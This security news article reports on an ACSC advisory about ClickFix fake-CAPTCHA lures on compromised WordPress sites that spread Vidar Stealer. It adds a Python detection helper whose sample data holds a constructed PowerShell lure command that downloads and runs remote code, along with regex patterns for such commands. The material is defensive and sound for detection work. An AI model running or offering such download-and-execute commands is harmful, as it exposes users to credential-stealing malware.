ClickFix Campaign Uses Compromised WordPress Sites to Spread Vidar Stealer in Australia

Filip TRUȚĂ

May 08, 2026

Cybercriminals are increasingly relying on social engineering instead of traditional exploits, and Australian authorities are warning that a spreading “ClickFix” campaign is a prime example.

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) has issued an advisory about an ongoing malware campaign targeting Australian infrastructure and organizations through compromised WordPress websites. The attacks use fake CAPTCHA or Cloudflare verification prompts to trick users into infecting their own systems with Vidar Stealer malware.

Key takeaways

  • The ACSC is warning that threat actors are using compromised WordPress sites to distribute Vidar Stealer malware.
  • The campaign relies on the “ClickFix” social engineering technique, which tricks users into manually executing malicious commands.
  • Victims are shown fake Cloudflare or CAPTCHA verification pages that copy malware commands to the clipboard.
  • Vidar Stealer targets passwords, browser cookies, cryptocurrency wallets, and other sensitive information.
  • ClickFix campaigns are spreading rapidly because they bypass many traditional security controls by exploiting user trust instead of software vulnerabilities.

What is ClickFix?

ClickFix is a relatively new social engineering tactic that has gained traction among cybercriminals over the past two years. Instead of silently exploiting vulnerabilities, attackers persuade users to run malicious commands themselves.

Typically, victims encounter a fake verification page masquerading as a CAPTCHA, browser check, or Cloudflare protection screen. The page instructs users to copy and paste a command into Windows Run, PowerShell, or Terminal to “verify” they are human or resolve a supposed technical issue.

In the campaign flagged by the ACSC, attackers compromised legitimate Australian WordPress websites and injected malicious JavaScript into them. When users visit the sites, they are redirected to fake verification prompts that deliver the malware chain.

Microsoft has warned that ClickFix attacks have become increasingly popular because they rely on “human intervention” rather than traditional malware delivery techniques, helping attackers evade some automated defenses.

Vidar Stealer remains a major threat

The payload delivered in this campaign is Vidar Stealer, a malware-as-a-service (MaaS) information stealer active since 2018.

Vidar is designed to harvest:

  • Saved browser credentials
  • Session cookies
  • Cryptocurrency wallet data
  • Autofill information
  • System details
  • Files from infected devices

The malware is especially dangerous because stolen browser session cookies can let attackers reuse an already-authenticated session, bypassing the password and even multi-factor authentication. Once collected, the data is typically sold on cybercrime marketplaces or used in follow-on attacks.

According to the ACSC, Vidar tries to reduce forensic traces by deleting its executable after launching and operating primarily in memory. The malware retrieves command-and-control infrastructure through “dead-drop” resolvers hosted on legitimate services such as Telegram bots and Steam profiles.

Compromised WordPress sites are fueling the campaign

Security researchers have observed a broader global trend involving the weaponization of compromised WordPress sites to deliver ClickFix malware.

Researchers said they identified more than 250 infected websites across at least 12 countries, including Australia, the United States, the United Kingdom, Germany, and Canada. Many of the sites belonged to legitimate businesses and organizations, increasing the credibility of the malicious prompts shown to visitors.

Attackers may be gaining access through stolen administrator credentials, exposed admin panels, vulnerable plugins, or weak passwords. The scale and automation of the campaign point to an organized criminal operation rather than opportunistic attackers.

Why these attacks work so well

ClickFix attacks exploit something security tools often struggle to detect: user behavior.

Instead of downloading a malicious attachment or exploiting a browser vulnerability, the victim willingly executes the malicious command. That makes the activity look more legitimate and can help attackers bypass security filters and endpoint protections.

The fake CAPTCHA and Cloudflare prompts also capitalize on familiarity. People encounter verification checks constantly online, making the malicious requests appear routine and trustworthy.

How to stay safe

Organizations and individuals should treat any website asking them to manually run commands on their systems as a major red flag.

Security experts recommend users:

  • Never copy and run commands from websites you don’t fully trust
  • Keep WordPress installations, plugins, and themes fully updated
  • Use strong, unique passwords and enable multi-factor authentication for admin accounts
  • Restrict PowerShell and scripting tools where possible
  • Train employees to recognize fake CAPTCHA and verification prompts
  • Use layered security solutions that can detect infostealers and suspicious behavior

Because info-stealing malware is designed to silently harvest credentials and session tokens, early detection is critical. A modern security solution with anti-phishing, web protection, and behavioral threat detection can help stop these attacks before sensitive data is compromised.
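As an added example (not code from the advisory, the ACSC or Bitdefender), the following Python helper shows the two places a user-pasted ClickFix command leaves a trace on a Windows host, which is what "behavioral threat detection" in the recommendations above comes down to in practice: process-creation telemetry, where the interpreter is spawned by explorer.exe (the parent of anything launched from the Run dialog) with a command line that fetches and executes remote content, and the Run dialog history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, where each value is the typed text followed by the two characters `\1` and `MRUList` gives the most-recent-first order. The field names follow Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`); the sample events, the RunMRU export, the indicator regexes, their weights and the threshold are all constructed for illustration and should be tuned to local telemetry.

```python
"""Triage helper for ClickFix-style "paste this command to verify" lures.

Added example, not the advisory's own tooling. Assumes Sysmon-like
process-creation fields and a RunMRU export as a dict of value names
to strings; all sample data below is constructed.
"""
import json
import re

# Interpreters a Run-dialog lure typically asks the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
RUN_PARENT = "explorer.exe"   # Run dialog (Win+R) children are spawned by explorer

# (regex, weight, description): each hit adds its weight to the score.
# Weights are illustrative; tune them against your own baseline.
INDICATORS = [
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I), 2, "remote fetch"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "in-memory execution"),
    (re.compile(r"\s-(w|win|windowstyle)\s+hidden\b", re.I), 1, "hidden window"),
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"\s-(nop|noprofile)\b", re.I), 1, "profile suppressed"),
    (re.compile(r"https?://", re.I), 1, "URL in command line"),
]
THRESHOLD = 3   # constructed cut-off: one indicator alone is not enough


def score_command(cmdline):
    """Return (score, [reasons]) for a single command line."""
    score, reasons = 0, []
    for rx, weight, why in INDICATORS:
        if rx.search(cmdline):
            score += weight
            reasons.append(why)
    return score, reasons


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_events(events):
    """Return the events that have the ClickFix shape: an interpreter spawned by
    explorer.exe whose command line scores at or above THRESHOLD."""
    hits = []
    for ev in events:
        if basename(ev["ParentImage"]) != RUN_PARENT:
            continue
        if basename(ev["Image"]) not in INTERPRETERS:
            continue
        score, reasons = score_command(ev["CommandLine"])
        if score >= THRESHOLD:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits


def parse_runmru(values):
    """Return Run-dialog history most-recent-first, trailing '\\1' stripped."""
    out = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        out.append(raw[:-2] if raw.endswith("\\1") else raw)
    return out


def flag_runmru(values):
    """Run-dialog entries whose text scores at or above THRESHOLD."""
    flagged = []
    for cmd in parse_runmru(values):
        score, reasons = score_command(cmd)
        if score >= THRESHOLD:
            flagged.append((cmd, reasons))
    return flagged


# Constructed Sysmon-style events: one lure execution, one benign PowerShell
# launch from the Run dialog, one download started by a build tool.
SAMPLE_EVENTS = [json.loads(line) for line in r'''
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -w hidden -nop -c \"iwr http://verify.example.invalid/chk | iex\""}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe"}
{"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Build\\make.exe","CommandLine":"cmd.exe /c curl -o out.bin https://pkg.example.invalid/x"}
'''.strip().splitlines()]

# Constructed RunMRU export: MRUList says "c" is the most recent entry.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "mstsc\\1",
    "c": "powershell -w hidden -c \"iwr http://verify.example.invalid/chk | iex\"\\1",
}

if __name__ == "__main__":
    for hit in flag_process_events(SAMPLE_EVENTS):
        print("process:", hit["score"], hit["reasons"], hit["CommandLine"])
    for cmd, reasons in flag_runmru(SAMPLE_RUNMRU):
        print("runmru :", reasons, cmd)
```

The process-creation rule is the one to put in a SIEM: it keys on the parent/child relationship rather than on the payload's file hash, so it keeps working when the lure's command text changes. The RunMRU parser is for incident response on a host that has already been reported, since the key records what the user actually typed even after the stealer has deleted its own executable.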

Author


Filip TRUȚĂ

Filip has 17 years of experience in technology journalism. In recent years, he has focused on cybersecurity in his role as a Security Analyst at Bitdefender.